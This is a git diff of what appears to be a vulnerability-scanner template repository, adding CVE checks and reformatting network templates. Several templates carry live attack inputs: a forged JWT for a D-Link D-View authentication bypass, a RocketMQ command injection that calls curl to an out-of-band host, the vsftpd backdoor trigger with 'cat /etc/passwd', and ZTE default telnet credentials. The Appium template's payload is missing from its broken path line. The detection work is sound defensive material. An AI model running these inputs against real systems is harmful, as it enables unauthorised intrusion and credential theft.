diff --git a/.new-additions b/.new-additions
index 702c5ee701..c08a9ca12d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,12 +1,15 @@
+http/cves/2023/CVE-2023-2479.yaml
http/cves/2023/CVE-2023-2766.yaml
http/cves/2023/CVE-2023-36845.yaml
http/cves/2023/CVE-2023-42442.yaml
http/cves/2023/CVE-2023-4568.yaml
+http/cves/2023/CVE-2023-5074.yaml
http/exposures/tokens/jotform/jotform-api-key.yaml
http/misconfiguration/installer/akeeba-installer.yaml
http/misconfiguration/installer/alma-installer.yaml
http/misconfiguration/installer/bitrix24-installer.yaml
http/misconfiguration/installer/gibbon-installer.yaml
+http/misconfiguration/installer/klr300n-installer.yaml
http/misconfiguration/installer/mantisbt-installer.yaml
http/misconfiguration/installer/ojs-installer.yaml
http/misconfiguration/installer/zabbix-installer.yaml
diff --git a/cves.json b/cves.json
index 78099bc39d..90a1d52a17 100644
--- a/cves.json
+++ b/cves.json
@@ -1915,6 +1915,7 @@
{"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"}
{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"}
{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
+{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"}
{"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
@@ -2000,6 +2001,7 @@
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
+{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"medium","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
{"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"}
{"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"}
@@ -2030,6 +2032,7 @@
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
+{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 8d2d832d28..554cdd5d98 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-39c60027acb5b66e6e4bb6ad252d317f
+6746b8c9a4fa68a5263fab717bdaed2f
diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt
index b0f61c56dd..0c9cb69569 100644
--- a/helpers/wordpress/plugins/admin-menu-editor.txt
+++ b/helpers/wordpress/plugins/admin-menu-editor.txt
@@ -1 +1 @@
-1.11.1
\ No newline at end of file
+1.11.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt
index a423d4217b..8a0feb98ca 100644
--- a/helpers/wordpress/plugins/astra-sites.txt
+++ b/helpers/wordpress/plugins/astra-sites.txt
@@ -1 +1 @@
-3.4.2
\ No newline at end of file
+3.4.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt
index 6a79ddb31f..4986c931ad 100644
--- a/helpers/wordpress/plugins/pixelyoursite.txt
+++ b/helpers/wordpress/plugins/pixelyoursite.txt
@@ -1 +1 @@
-9.4.5.1
\ No newline at end of file
+9.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index 7491cf3bcc..4843910948 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.10.9
\ No newline at end of file
+4.10.10
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt
index 6b0e58e78f..cb1d6217e1 100644
--- a/helpers/wordpress/plugins/sg-cachepress.txt
+++ b/helpers/wordpress/plugins/sg-cachepress.txt
@@ -1 +1 @@
-7.4.1
\ No newline at end of file
+7.4.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt
index 03e5161d2c..7b5753f55b 100644
--- a/helpers/wordpress/plugins/sg-security.txt
+++ b/helpers/wordpress/plugins/sg-security.txt
@@ -1 +1 @@
-1.4.5
\ No newline at end of file
+1.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index 4be2c727ad..3d5762e858 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.5.0
\ No newline at end of file
+6.5.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
index 7e541aec69..a6254504e4 100644
--- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
@@ -1 +1 @@
-2.2.2
\ No newline at end of file
+2.3.1
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
new file mode 100644
index 0000000000..5339dfe1c3
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -0,0 +1,48 @@
+id: CVE-2023-2479
+
+info:
+ name: Appium Desktop Server - Remote Code Execution
+ author: zn9988
+ severity: critical
+ description: |
+ OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
+ - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
+ remediation: Fixed in v1.22.3-4
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-2479
+ cwe-id: CWE-78
+ cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
+ epss-score: 0.0008
+ metadata:
+ max-request: 1
+ tags: cve,cve2023,appium,oast,rce
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?url=
'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: status
+ status:
+ - 404
diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
new file mode 100644
index 0000000000..d6b876e592
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-5074
+
+info:
+ name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
+ remediation: |
+ Upgrade to the latest version to mitigate this vulnerability.
+ reference:
+ - https://www.tenable.com/security/research/tra-2023-32
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-5074
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-0563
+ cwe-id: CWE-798
+ epss-score: 0.00563
+ epss-percentile: 0.74832
+ cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.favicon.hash:-1317621215
+ fofa-query: icon_hash="-1317621215"
+ vendor: dlink
+ product: d-view_8
+ tags: cve,cve2023,d-link,auth-bypass
+
+http:
+ - raw:
+ - |
+ GET /dview8/api/usersByLevel HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
+ - 'contains(header, "application/json")'
+ condition: and
diff --git a/http/misconfiguration/installer/klr300n-installer.yaml b/http/misconfiguration/installer/klr300n-installer.yaml
new file mode 100644
index 0000000000..b17ed06001
--- /dev/null
+++ b/http/misconfiguration/installer/klr300n-installer.yaml
@@ -0,0 +1,36 @@
+id: klr300n-install
+
+info:
+ name: KLR 300N Router - Exposed Installation
+ author: andreluna
+ severity: high
+ description: |
+ Home router wireless KLR 300N setup page were Detected.
+ reference:
+ - http://www.keo.com.br/produtos/roteador-klr-300n
+ - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: html:"def_wirelesspassword"
+ tags: keo,klr300n,misconfig,exposure,iot,install
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Roteador Wireless KLR 300N"
+ - "def_wirelesspassword"
+ - "Installation assitance"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -1,7 +1,7 @@
id: wordpress-sg-cachepress
info:
- name: SiteGround Optimizer Detection
+ name: Speed Optimizer – The All-In-One WordPress Performance-Boosting Plugin Detection
author: ricardomaia
severity: info
reference:
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -1,7 +1,7 @@
id: wordpress-sg-security
info:
- name: All-inclusive Security Solution by SiteGround Detection
+ name: Security Optimizer – The All-In-One WordPress Protection Plugin Detection
author: ricardomaia
severity: info
reference:
diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml
index 699a27b60b..fe8cf86de6 100644
--- a/network/backdoor/backdoored-zte.yaml
+++ b/network/backdoor/backdoored-zte.yaml
@@ -10,19 +10,18 @@ info:
- https://www.exploit-db.com/ghdb/7179
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cwe-id: CWE-912
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: http.html:"ZTE Corporation"
+ verified: true
tags: edb,network,zte,telnet,backdoor,router
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:23"
-
+ port: 23
inputs:
- data: "root\r\n"
- data: "Zte521\r\n\r\n"
diff --git a/network/backdoor/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml
index e8195a5bff..953a380eb8 100644
--- a/network/backdoor/vsftpd-backdoor.yaml
+++ b/network/backdoor/vsftpd-backdoor.yaml
@@ -7,23 +7,22 @@ info:
description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability.
reference:
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
+ remediation: This backdoor was removed on July 3rd, 2011.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cwe-id: CWE-78
- remediation: This backdoor was removed on July 3rd, 2011.
- tags: network,vsftpd,ftp,backdoor
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,vsftpd,ftp,backdoor
tcp:
- inputs:
- data: "USER anonymous\r\nPASS anonymous\r\n"
host:
- - "{{Host}}:21"
- "{{Hostname}}"
-
+ port: 21
matchers:
- type: word
words:
diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml
index eceb3e855e..003c9d7137 100644
--- a/network/cves/2001/CVE-2001-1473.yaml
+++ b/network/cves/2001/CVE-2001-1473.yaml
@@ -5,28 +5,28 @@ info:
author: iamthefrogy
severity: high
description: SSHv1 is deprecated and has known cryptographic issues.
- remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
- http://www.kb.cert.org/vuls/id/684820
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6603
+ remediation: Upgrade to SSH 2.4 or later.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2001-1473
cwe-id: CWE-310
- epss-score: 0.00258
cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:*
+ epss-score: 0.00258
metadata:
- max-request: 2
- vendor: ssh
+ max-request: 1
product: ssh
+ vendor: ssh
tags: cve,cve2001,network,ssh,openssh
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:22"
+ port: 22
matchers:
- type: word
words:
diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml
index eaecc8b8c0..8fb474a7fb 100644
--- a/network/cves/2011/CVE-2011-2523.yaml
+++ b/network/cves/2011/CVE-2011-2523.yaml
@@ -34,7 +34,8 @@ variables:
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
tcp:
- host:
- - "{{Host}}:21"
+ - "{{Hostname}}"
+ port: 21
inputs:
- data: "USER letmein:)\r\nPASS please\r\n"
read: 100
diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml
index 7211249079..3c2d3d5a03 100644
--- a/network/cves/2015/CVE-2015-3306.yaml
+++ b/network/cves/2015/CVE-2015-3306.yaml
@@ -14,22 +14,23 @@ info:
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-3306
+ remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2015-3306
cwe-id: CWE-284
- epss-score: 0.97267
cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
+ epss-score: 0.97267
metadata:
- max-request: 2
- vendor: proftpd
+ max-request: 1
product: proftpd
+ vendor: proftpd
tags: cve,cve2015,ftp,rce,network,proftpd,edb
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:21"
+ port: 21
inputs:
- data: "site cpfr /proc/self/cmdline\r\n"
read: 1024
diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml
index ec7b896b13..85d351c418 100644
--- a/network/cves/2023/CVE-2023-33246.yaml
+++ b/network/cves/2023/CVE-2023-33246.yaml
@@ -15,20 +15,21 @@ info:
- http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
- http://www.openwall.com/lists/oss-security/2023/07/12/1
- https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
+ remediation: Update the RocketMQ application to version 5.1.1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33246
cwe-id: CWE-94
- epss-score: 0.95581
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
+ epss-score: 0.95581
metadata:
- verified: true
- max-request: 2
- vendor: apache
+ fofa-query: protocol="rocketmq"
+ max-request: 1
product: rocketmq
shodan-query: title:"RocketMQ"
- fofa-query: protocol="rocketmq"
+ vendor: apache
+ verified: true
tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
variables:
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
@@ -36,7 +37,8 @@ variables:
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:10911"
+ port: 10911
+
inputs:
- data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}'
read: 1024
diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml
index 3c210d02b5..4888a5170b 100644
--- a/network/default-login/ftp-anonymous-login.yaml
+++ b/network/default-login/ftp-anonymous-login.yaml
@@ -4,13 +4,13 @@ info:
name: FTP Anonymous Login
author: C3l3si4n,pussycat0x
severity: medium
- reference:
- - https://tools.ietf.org/html/rfc2577
description: |
Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended.
- tags: network,ftp,default-login
+ reference:
+ - https://tools.ietf.org/html/rfc2577
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,ftp,default-login
tcp:
- inputs:
@@ -20,8 +20,8 @@ tcp:
read: 1024
host:
- - "{{Host}}:21"
- "{{Hostname}}"
+ port: 21
matchers-condition: and
matchers:
diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml
index 696970bf22..8e8ae5c1c2 100644
--- a/network/default-login/ftp-weak-credentials.yaml
+++ b/network/default-login/ftp-weak-credentials.yaml
@@ -8,11 +8,11 @@ info:
reference:
- https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
classification:
- cvss-score: 8.5
cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
- tags: network,ftp,default-login,service
+ cvss-score: 8.5
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,ftp,default-login,service
tcp:
@@ -21,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:21"
+ port: 21
attack: clusterbomb
payloads:
diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml
index aae1a43689..48d4b0e1d8 100644
--- a/network/default-login/ldap-anonymous-login.yaml
+++ b/network/default-login/ldap-anonymous-login.yaml
@@ -13,9 +13,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-284
- tags: network,ldap,default-login,tenable
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,ldap,default-login,tenable
tcp:
- inputs:
@@ -24,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:389"
+ port: 389
read-size: 1024
matchers:
diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml
index 1930969a7e..7502fb0322 100644
--- a/network/detection/activemq-openwire-transport-detect.yaml
+++ b/network/detection/activemq-openwire-transport-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"ActiveMQ OpenWire transport"
verified: true
- shodan-query: 'product:"ActiveMQ OpenWire transport"'
tags: network,activemq,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:61616"
+ port: 61616
matchers-condition: and
matchers:
diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml
index e927ea96bf..82acb9b8a4 100644
--- a/network/detection/apache-activemq-detect.yaml
+++ b/network/detection/apache-activemq-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"Apache ActiveMQ"
verified: true
- shodan-query: 'product:"Apache ActiveMQ"'
tags: network,activemq,oss,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:61613"
+ port: 61613
matchers-condition: and
matchers:
diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml
index 8b6bc4df23..5c3bc6fa86 100644
--- a/network/detection/axigen-mail-server-detect.yaml
